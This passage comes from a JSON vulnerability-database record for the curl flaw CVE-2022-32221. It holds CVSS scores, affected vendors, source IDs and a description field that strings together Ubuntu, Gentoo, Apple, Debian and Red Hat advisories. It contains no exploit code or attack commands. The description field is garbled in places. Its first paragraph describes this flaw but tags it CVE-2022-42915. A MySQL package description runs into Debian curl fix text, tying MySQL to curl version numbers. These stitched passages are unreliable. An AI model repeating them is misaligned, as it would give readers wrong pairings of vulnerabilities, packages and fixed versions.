"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-32221"
}
]
},
"credits": {
"_id": null,
"data": "Ubuntu",
"sources": [
{
"db": "PACKETSTORM",
"id": "169538"
},
{
"db": "PACKETSTORM",
"id": "169535"
},
{
"db": "PACKETSTORM",
"id": "170729"
}
],
"trust": 0.3
},
"cve": "CVE-2022-32221",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2022-32221",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-32221",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-32221",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-202210-2214",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-2214"
},
{
"db": "NVD",
"id": "CVE-2022-32221"
},
{
"db": "NVD",
"id": "CVE-2022-32221"
}
]
},
"description": {
"_id": null,
"data": "When doing HTTP(S) transfers, libcurl might erroneously use the read callback (`CURLOPT_READFUNCTION`) to ask for data to send, even when the `CURLOPT_POSTFIELDS` option has been set, if the same handle previously was used to issue a `PUT` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent `POST` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST. (CVE-2022-42915). ==========================================================================\nUbuntu Security Notice USN-5702-1\nOctober 26, 2022\n\ncurl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 22.10\n- Ubuntu 22.04 LTS\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in curl. \n\nSoftware Description:\n- curl: HTTP, HTTPS, and FTP client and client libraries\n\nDetails:\n\nRobby Simpson discovered that curl incorrectly handled certain POST\noperations after PUT operations. \n(CVE-2022-32221)\n\nHiroki Kurosawa discovered that curl incorrectly handled parsing .netrc\nfiles. If an attacker were able to provide a specially crafted .netrc file,\nthis issue could cause curl to crash, resulting in a denial of service. \nThis issue only affected Ubuntu 22.10. (CVE-2022-35260)\n\nIt was discovered that curl incorrectly handled certain HTTP proxy return\ncodes. A remote attacker could use this issue to cause curl to crash,\nresulting in a denial of service, or possibly execute arbitrary code. This\nissue only affected Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2022-42915)\n\nHiroki Kurosawa discovered that curl incorrectly handled HSTS support\nwhen certain hostnames included IDN characters. 
A remote attacker could\npossibly use this issue to cause curl to use unencrypted connections. This\nissue only affected Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2022-42916)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 22.10:\n curl 7.85.0-1ubuntu0.1\n libcurl3-gnutls 7.85.0-1ubuntu0.1\n libcurl3-nss 7.85.0-1ubuntu0.1\n libcurl4 7.85.0-1ubuntu0.1\n\nUbuntu 22.04 LTS:\n curl 7.81.0-1ubuntu1.6\n libcurl3-gnutls 7.81.0-1ubuntu1.6\n libcurl3-nss 7.81.0-1ubuntu1.6\n libcurl4 7.81.0-1ubuntu1.6\n\nUbuntu 20.04 LTS:\n curl 7.68.0-1ubuntu2.14\n libcurl3-gnutls 7.68.0-1ubuntu2.14\n libcurl3-nss 7.68.0-1ubuntu2.14\n libcurl4 7.68.0-1ubuntu2.14\n\nUbuntu 18.04 LTS:\n curl 7.58.0-2ubuntu3.21\n libcurl3-gnutls 7.58.0-2ubuntu3.21\n libcurl3-nss 7.58.0-2ubuntu3.21\n libcurl4 7.58.0-2ubuntu3.21\n\nIn general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202212-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: curl: Multiple Vulnerabilities\n Date: December 19, 2022\n Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365\n ID: 202212-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been found in curl, the worst of which\ncould result in arbitrary code execution. \n\nBackground\n=========\nA command line tool and library for transferring data with URLs. 
\n\nAffected packages\n================\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/curl \u003c 7.86.0 \u003e= 7.86.0\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in curl. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. \n\nResolution\n=========\nAll curl users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.86.0\"\n\nReferences\n=========\n[ 1 ] CVE-2021-22922\n https://nvd.nist.gov/vuln/detail/CVE-2021-22922\n[ 2 ] CVE-2021-22923\n https://nvd.nist.gov/vuln/detail/CVE-2021-22923\n[ 3 ] CVE-2021-22925\n https://nvd.nist.gov/vuln/detail/CVE-2021-22925\n[ 4 ] CVE-2021-22926\n https://nvd.nist.gov/vuln/detail/CVE-2021-22926\n[ 5 ] CVE-2021-22945\n https://nvd.nist.gov/vuln/detail/CVE-2021-22945\n[ 6 ] CVE-2021-22946\n https://nvd.nist.gov/vuln/detail/CVE-2021-22946\n[ 7 ] CVE-2021-22947\n https://nvd.nist.gov/vuln/detail/CVE-2021-22947\n[ 8 ] CVE-2022-22576\n https://nvd.nist.gov/vuln/detail/CVE-2022-22576\n[ 9 ] CVE-2022-27774\n https://nvd.nist.gov/vuln/detail/CVE-2022-27774\n[ 10 ] CVE-2022-27775\n https://nvd.nist.gov/vuln/detail/CVE-2022-27775\n[ 11 ] CVE-2022-27776\n https://nvd.nist.gov/vuln/detail/CVE-2022-27776\n[ 12 ] CVE-2022-27779\n https://nvd.nist.gov/vuln/detail/CVE-2022-27779\n[ 13 ] CVE-2022-27780\n https://nvd.nist.gov/vuln/detail/CVE-2022-27780\n[ 14 ] CVE-2022-27781\n https://nvd.nist.gov/vuln/detail/CVE-2022-27781\n[ 15 ] CVE-2022-27782\n https://nvd.nist.gov/vuln/detail/CVE-2022-27782\n[ 16 ] CVE-2022-30115\n https://nvd.nist.gov/vuln/detail/CVE-2022-30115\n[ 17 ] CVE-2022-32205\n https://nvd.nist.gov/vuln/detail/CVE-2022-32205\n[ 18 ] 
CVE-2022-32206\n https://nvd.nist.gov/vuln/detail/CVE-2022-32206\n[ 19 ] CVE-2022-32207\n https://nvd.nist.gov/vuln/detail/CVE-2022-32207\n[ 20 ] CVE-2022-32208\n https://nvd.nist.gov/vuln/detail/CVE-2022-32208\n[ 21 ] CVE-2022-32221\n https://nvd.nist.gov/vuln/detail/CVE-2022-32221\n[ 22 ] CVE-2022-35252\n https://nvd.nist.gov/vuln/detail/CVE-2022-35252\n[ 23 ] CVE-2022-35260\n https://nvd.nist.gov/vuln/detail/CVE-2022-35260\n[ 24 ] CVE-2022-42915\n https://nvd.nist.gov/vuln/detail/CVE-2022-42915\n[ 25 ] CVE-2022-42916\n https://nvd.nist.gov/vuln/detail/CVE-2022-42916\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202212-01\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2023-01-23-4 macOS Ventura 13.2\n\nmacOS Ventura 13.2 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213605. \n\nAppleMobileFileIntegrity\nAvailable for: macOS Ventura\nImpact: An app may be able to access user-sensitive data\nDescription: This issue was addressed by enabling hardened runtime. \nCVE-2023-23499: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n(wojciechregula.blog)\n\ncurl\nAvailable for: macOS Ventura\nImpact: Multiple issues in curl\nDescription: Multiple issues were addressed by updating to curl\nversion 7.86.0. 
\nCVE-2022-42915\nCVE-2022-42916\nCVE-2022-32221\nCVE-2022-35260\n\ndcerpc\nAvailable for: macOS Ventura\nImpact: Mounting a maliciously crafted Samba network share may lead\nto arbitrary code execution\nDescription: A buffer overflow issue was addressed with improved\nmemory handling. \nCVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco\nTalos\n\nDiskArbitration\nAvailable for: macOS Ventura\nImpact: An encrypted volume may be unmounted and remounted by a\ndifferent user without prompting for the password\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)\n\nImageIO\nAvailable for: macOS Ventura\nImpact: Processing an image may lead to a denial-of-service\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2023-23519: Yi\u011fit Can YILMAZ (@yilmazcanyigit)\n\nIntel Graphics Driver\nAvailable for: macOS Ventura\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved bounds checks. \nCVE-2023-23507: an anonymous researcher\n\nKernel\nAvailable for: macOS Ventura\nImpact: An app may be able to leak sensitive kernel state\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23500: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. \nLtd. (@starlabs_sg)\n\nKernel\nAvailable for: macOS Ventura\nImpact: An app may be able to determine kernel memory layout\nDescription: An information disclosure issue was addressed by\nremoving the vulnerable code. \nCVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. \nLtd. (@starlabs_sg)\n\nKernel\nAvailable for: macOS Ventura\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved memory handling. 
\nCVE-2023-23504: Adam Doup\u00e9 of ASU SEFCOM\n\nlibxpc\nAvailable for: macOS Ventura\nImpact: An app may be able to access user-sensitive data\nDescription: A permissions issue was addressed with improved\nvalidation. \nCVE-2023-23506: Guilherme Rambo of Best Buddy Apps (rambo.codes)\n\nMail Drafts\nAvailable for: macOS Ventura\nImpact: The quoted original message may be selected from the wrong\nemail when forwarding an email from an Exchange account\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2023-23498: an anonymous researcher\n\nMaps\nAvailable for: macOS Ventura\nImpact: An app may be able to bypass Privacy preferences\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2023-23503: an anonymous researcher\n\nPackageKit\nAvailable for: macOS Ventura\nImpact: An app may be able to gain root privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2023-23497: Mickey Jin (@patch1t)\n\nSafari\nAvailable for: macOS Ventura\nImpact: An app may be able to access a user\u2019s Safari history\nDescription: A permissions issue was addressed with improved\nvalidation. \nCVE-2023-23510: Guilherme Rambo of Best Buddy Apps (rambo.codes)\n\nSafari\nAvailable for: macOS Ventura\nImpact: Visiting a website may lead to an app denial-of-service\nDescription: The issue was addressed with improved handling of\ncaches. \nCVE-2023-23512: Adriatik Raci\n\nScreen Time\nAvailable for: macOS Ventura\nImpact: An app may be able to access information about a user\u2019s\ncontacts\nDescription: A privacy issue was addressed with improved private data\nredaction for log entries. \nCVE-2023-23505: Wojciech Regu\u0142a of SecuRing (wojciechregula.blog)\n\nVim\nAvailable for: macOS Ventura\nImpact: Multiple issues in Vim\nDescription: A use after free issue was addressed with improved\nmemory management. 
\nCVE-2022-3705\n\nWeather\nAvailable for: macOS Ventura\nImpact: An app may be able to bypass Privacy preferences\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an\nanonymous researcher\n\nWebKit\nAvailable for: macOS Ventura\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: The issue was addressed with improved checks. \nWebKit Bugzilla: 245464\nCVE-2023-23496: ChengGang Wu, Yan Kang, YuHao Hu, Yue Sun, Jiming\nWang, JiKai Ren and Hang Shu of Institute of Computing Technology,\nChinese Academy of Sciences\n\nWebKit\nAvailable for: macOS Ventura\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: The issue was addressed with improved memory handling. \nWebKit Bugzilla: 248268\nCVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park\n(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),\nJunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE\nWebKit Bugzilla: 248268\nCVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park\n(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),\nJunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE\n\nWi-Fi\nAvailable for: macOS Ventura\nImpact: An app may be able to disclose kernel memory\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23501: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. \nLtd. (@starlabs_sg)\n\nWindows Installer\nAvailable for: macOS Ventura\nImpact: An app may be able to bypass Privacy preferences\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23508: Mickey Jin (@patch1t)\n\nAdditional recognition\n\nBluetooth\nWe would like to acknowledge an anonymous researcher for their\nassistance. \n\nKernel\nWe would like to acknowledge Nick Stenning of Replicate for their\nassistance. 
\n\nShortcuts\nWe would like to acknowledge Baibhav Anand Jha from ReconWithMe and\nCristian Dinca of Tudor Vianu National High School of Computer\nScience, Romania for their assistance. \n\nWebKit\nWe would like to acknowledge Eliya Stein of Confiant for their\nassistance. \n\nmacOS Ventura 13.2 may be obtained from the Mac App Store or Apple\u0027s\nSoftware Downloads web site: https://support.apple.com/downloads/\nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. \n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPPIl8ACgkQ4RjMIDke\nNxnt7RAA2a0c/Ij93MfR8eiNMkIHVnr+wL+4rckVmHvs85dSHNBqQ8+kYpAs2tEk\n7CVZoxAGg8LqVa6ZmBbAp5ZJGi2nV8LjOYzaWw/66d648QC2upTWJ93sWmZ7LlLb\nm9pcLfBsdAFPmVa8VJO0fxJGkxsCP0cQiBl+f9R4ObZBBiScbHUckSmHa6Qn/Q2U\nVsnHnJznAlDHMXiaV3O1zKBeahkqSx/IfO04qmk8oMWh89hI53S551Z3NEx63zgd\nCx8JENj2NpFlgmZ0w0Tz5ZZ3LT4Ok28ns8N762JLE2nbTfEl7rM+bjUfWg4yJ1Rp\nTCEelbLKfUjlrh2N1fe0XWBs9br/069QlhTBBVd/qAbUBxkS/UOlWk3Vp+TI0bkK\nrrXouRijzRmBBK93jfWxhyd27avqQHmc04ofjY/lNYOCcGMrr813cGKNs90aRfcg\njoKeC51mYJnlTyMB0nDcJx3b5+MN+Ij7Sa04B9dbH162YFxp4LsaavmR0MooN1T9\n3XrXEQ71a3pvdoF1ffW9Mz7vaqhBkffnzQwWU5zY2RwDTjFyHdNyI/1JkVzYmAxq\nQR4uA5gCDYYk/3rzlrVot+ezHX525clTHsvEYhIfu+i1HCxqdpvfaHbn2m+i1QtU\n/Lzz2mySt3y0akZ2rHwPfBZ8UFfvaauyhZ3EhSP3ikGs9DOsv1w=\n=pcJ4\n-----END PGP SIGNATURE-----\n\n\n. \n\nSoftware Description:\n- mysql-8.0: MySQL database\n- mysql-5.7: MySQL database\n\nDetails:\n\nMultiple security issues were discovered in MySQL and this update includes\nnew upstream MySQL versions to fix these issues. \n\nIn addition to security fixes, the updated packages contain bug fixes, new\nfeatures, and possibly incompatible changes. In general, a standard system update will make all the necessary\nchanges. 
\n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 7.74.0-1.3+deb11u5. This update also revises the fix for\nCVE-2022-27774 released in DSA-5197-1. \n\nWe recommend that you upgrade your curl packages. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: curl security update\nAdvisory ID: RHSA-2023:4139-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:4139\nIssue date: 2023-07-18\nCVE Names: CVE-2022-32221 CVE-2023-23916 \n=====================================================================\n\n1. Summary:\n\nAn update for curl is now available for Red Hat Enterprise Linux 9.0\nExtended Update Support. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nSecurity Fix(es):\n\n* curl: POST following PUT confusion (CVE-2022-32221)\n\n* curl: HTTP multi-header compression denial of service (CVE-2023-23916)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2135411 - CVE-2022-32221 curl: POST following PUT confusion\n2167815 - CVE-2023-23916 curl: HTTP multi-header compression denial of service\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream EUS (v.9.0):\n\naarch64:\ncurl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.aarch64.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\nlibcurl-devel-7.76.1-14.el9_0.6.aarch64.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\n\nppc64le:\ncurl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.ppc64le.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\nlibcurl-devel-7.76.1-14.el9_0.6.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\n\ns390x:\ncurl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.s390x.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\nlibcurl-devel-7.76.1-14.el9_0.6.s390x.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\n\nx86_64:\ncurl-debuginfo-7.76.1-14.el9_0.6.i686.rpm\ncurl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.i686.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.x86_64.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.i686.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\nlibcurl-devel-7.76.1-14.el9_0.6.i686.rpm\nlibcurl-devel-7.76.1-14.el9_0.6.x86_64.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\n\nRed Hat Enterprise Linux BaseOS EUS 
(v.9.0):\n\nSource:\ncurl-7.76.1-14.el9_0.6.src.rpm\n\naarch64:\ncurl-7.76.1-14.el9_0.6.aarch64.rpm\ncurl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.aarch64.rpm\ncurl-minimal-7.76.1-14.el9_0.6.aarch64.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\nlibcurl-7.76.1-14.el9_0.6.aarch64.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\nlibcurl-minimal-7.76.1-14.el9_0.6.aarch64.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm\n\nppc64le:\ncurl-7.76.1-14.el9_0.6.ppc64le.rpm\ncurl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.ppc64le.rpm\ncurl-minimal-7.76.1-14.el9_0.6.ppc64le.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\nlibcurl-7.76.1-14.el9_0.6.ppc64le.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\nlibcurl-minimal-7.76.1-14.el9_0.6.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm\n\ns390x:\ncurl-7.76.1-14.el9_0.6.s390x.rpm\ncurl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.s390x.rpm\ncurl-minimal-7.76.1-14.el9_0.6.s390x.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\nlibcurl-7.76.1-14.el9_0.6.s390x.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\nlibcurl-minimal-7.76.1-14.el9_0.6.s390x.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm\n\nx86_64:\ncurl-7.76.1-14.el9_0.6.x86_64.rpm\ncurl-debuginfo-7.76.1-14.el9_0.6.i686.rpm\ncurl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.i686.rpm\ncurl-debugsource-7.76.1-14.el9_0.6.x86_64.rpm\ncurl-minimal-7.76.1-14.el9_0.6.x86_64.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm\ncurl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\nlibcurl-7.76.1-14.el9_0.6.i686.rpm\nlibcurl-7.76.1-14.el9_0.6.x86_64.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.i686.rpm\nlibcurl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\nlibcurl-minimal-7.76.1-14.el9_0.6.i686.rpm\nlibcurl-minimal-7.76.1-14.el9_0.6.x86_64.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_
0.6.i686.rpm\nlibcurl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-32221\nhttps://access.redhat.com/security/cve/CVE-2023-23916\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-32221"
},
{
"db": "VULHUB",
"id": "VHN-424148"
},
{
"db": "VULMON",
"id": "CVE-2022-32221"
},
{
"db": "PACKETSTORM",
"id": "169538"
},
{
"db": "PACKETSTORM",
"id": "169535"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "170697"
},
{
"db": "PACKETSTORM",
"id": "170696"
},
{
"db": "PACKETSTORM",
"id": "170729"
},
{
"db": "PACKETSTORM",
"id": "170777"
},
{
"db": "PACKETSTORM",
"id": "173569"
}
],
"trust": 1.8
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-32221",
"trust": 2.6
},
{
"db": "HACKERONE",
"id": "1704017",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2023/05/17/4",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "170777",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "169535",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "169538",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "170166",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3143",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.4030",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5421",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6333",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202210-2214",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "170729",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170648",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-424148",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-32221",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170697",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170696",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "173569",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-424148"
},
{
"db": "VULMON",
"id": "CVE-2022-32221"
},
{
"db": "PACKETSTORM",
"id": "169538"
},
{
"db": "PACKETSTORM",
"id": "169535"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "170697"
},
{
"db": "PACKETSTORM",
"id": "170696"
},
{
"db": "PACKETSTORM",
"id": "170729"
},
{
"db": "PACKETSTORM",
"id": "170777"
},
{
"db": "PACKETSTORM",
"id": "173569"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-2214"
},
{
"db": "NVD",
"id": "CVE-2022-32221"
}
]
},
"id": "VAR-202210-1888",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-424148"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T22:55:07.161000Z",
"patch": {
"_id": null,
"data": [
{
"title": "curl Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=216855"
},
{
"title": "Ubuntu Security Notice: USN-5702-2: curl vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5702-2"
},
{
"title": "Ubuntu Security Notice: USN-5702-1: curl vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5702-1"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-32221"
},
{
"title": "IBM: Security Bulletin: The Community Edition of IBM ILOG CPLEX Optimization Studio is affected by multiple vulnerabilities in libcurl (CVE-2022-42915, CVE-2022-42916, CVE-2022-32221)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=93e8baf3e9bfd9ab92a05b44368ef244"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-32221"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-2214"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-668",
"trust": 1.1
},
{
"problemtype": "CWE-200",
"trust": 1.0
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-424148"
},
{
"db": "NVD",
"id": "CVE-2022-32221"
}
]
